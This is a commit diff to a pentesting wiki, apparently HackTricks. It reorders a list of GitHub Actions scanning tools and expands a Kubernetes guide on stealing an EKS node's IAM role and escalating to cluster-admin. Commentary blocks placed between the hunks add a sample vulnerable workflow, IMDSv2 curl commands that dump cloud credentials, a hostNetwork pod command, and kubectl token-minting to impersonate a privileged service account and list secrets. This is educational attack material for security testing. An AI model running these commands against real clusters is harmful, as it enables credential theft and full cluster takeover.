Commit d034181
Commit message: a
1 parent: f259961

File tree: 2 files changed (+35, -12 lines)

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

Lines changed: 10 additions & 9 deletions
@@ -2,6 +2,16 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
+## Tools
+
+The following tools are useful for finding GitHub Actions workflows and even spotting vulnerable ones:
+
+- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
+- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
+- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
+- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
+- [https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - check also its audit checklist at [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits)
+
 ## Basic Information
 
 In this page you will find:
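To illustrate what the scanners in the tools list flag, here is a minimal, self-contained triage sketch: it writes a hypothetical vulnerable workflow (a `pull_request_target` trigger, checkout of attacker-controlled code, and an expression-injection sink) and greps for those patterns. This is only a crude approximation of what raven/gato/zizmor automate, not a substitute for running them.

```shell
# Create a hypothetical (intentionally vulnerable) workflow to scan.
mkdir -p demo/.github/workflows
cat > demo/.github/workflows/ci.yml <<'EOF'
name: CI
on: pull_request_target   # runs with a write token even for fork PRs
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # attacker-controlled code
      - run: echo "${{ github.event.pull_request.title }}"  # expression injection sink
EOF

# Crude grep triage for patterns the tools above detect automatically:
# dangerous triggers...
grep -rnE 'pull_request_target|workflow_run' demo/.github/workflows
# ...and attacker-controlled expression expansions
grep -rnE '\$\{\{[[:space:]]*github\.event\.(pull_request|issue|comment)' demo/.github/workflows
```

Finding such a pattern does not prove exploitability; the tools above also model reachability and token permissions.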
@@ -569,15 +579,6 @@ An organization in GitHub is very proactive in reporting accounts to GitHub. All
 > [!WARNING]
 > The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
 
-## Tools
-
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
-
-- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
-- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
-- [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
-- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
-
 {{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md

Lines changed: 25 additions & 3 deletions
@@ -287,11 +287,18 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
 done | grep -B 1 "amazonaws.com"
 ```
 
-### Node IAM Role
+### Node IAM Role to cluster-admin
 
-The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
+The previous section covered how to steal IAM roles from pods, but note that a **Node of the** K8s cluster is an **instance inside the cloud**. This means the Node will very likely **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth checking each node_).
 
-There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:
+To access the node metadata endpoint you need to:
+- Be in a pod with the metadata endpoint configured to allow at least 2 TCP hops. This is the most common misconfiguration, as pods in the cluster usually need access to the metadata endpoint to work, and several companies simply allow access to it from all pods in the cluster.
+- Be in a pod with `hostNetwork` enabled.
+- Escape to the node and access the metadata endpoint directly.
+
+(Note that the metadata endpoint is, as always, at 169.254.169.254.)
+
+To **share the node's network** you can use the following command to run a pod with `hostNetwork` enabled:
 
 ```bash
 kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
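Once you are on the node's network (or the hop limit allows it from a regular pod), the standard IMDSv2 flow retrieves the node role's credentials. A sketch, assuming network reachability of 169.254.169.254; where IMDSv1 is still enabled, the same `meta-data` paths work without the token header:

```shell
# IMDSv2: get a session token first. The PUT request is what a hop limit of 1
# blocks from inside a pod (the pod's bridge adds an extra network hop).
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# List the role attached to the node, then dump its temporary credentials.
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
```

Defenders can close the first (hop-limit) path with `aws ec2 modify-instance-metadata-options --http-put-response-hop-limit 1` on the node instances.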
@@ -314,6 +321,21 @@ if [ "$IAM_ROLE_NAME" ]; then
 fi
 ```
 
+### Privesc to cluster-admin
+
+In summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full Kubernetes cluster**.
+
+For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). In short, the IAM role that is assigned to EKS nodes by default is granted the `system:node` role inside the cluster. This role is very interesting, although it is limited by the Kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction).
+
+However, the node can always **generate tokens for service accounts** running in pods on that node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate it, like in:
+
+```bash
+kubectl --context=node1 create token -n ns1 sa-priv \
+  --bound-object-kind=Pod \
+  --bound-object-name=pod-priv \
+  --bound-object-uid=7f7e741a-12f5-4148-91b4-4bc94f75998d
+```
+
 ## References
 
 - [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
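A token minted this way can be used directly against the API server. A sketch: the context, namespace, service-account and pod names, and the UID are the illustrative values from the example in the diff, not real objects:

```shell
# Mint a token bound to the privileged pod (names/UID are illustrative).
SA_TOKEN=$(kubectl --context=node1 create token -n ns1 sa-priv \
  --bound-object-kind=Pod \
  --bound-object-name=pod-priv \
  --bound-object-uid=7f7e741a-12f5-4148-91b4-4bc94f75998d)

# Use the stolen identity: enumerate what the SA can do, then act on it.
kubectl --token="$SA_TOKEN" auth can-i --list -n ns1
kubectl --token="$SA_TOKEN" get secrets -A   # succeeds if the SA has cluster-wide read
```

Binding the token to the pod object means it is only valid while that pod exists, which is exactly why the node is allowed to request it.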
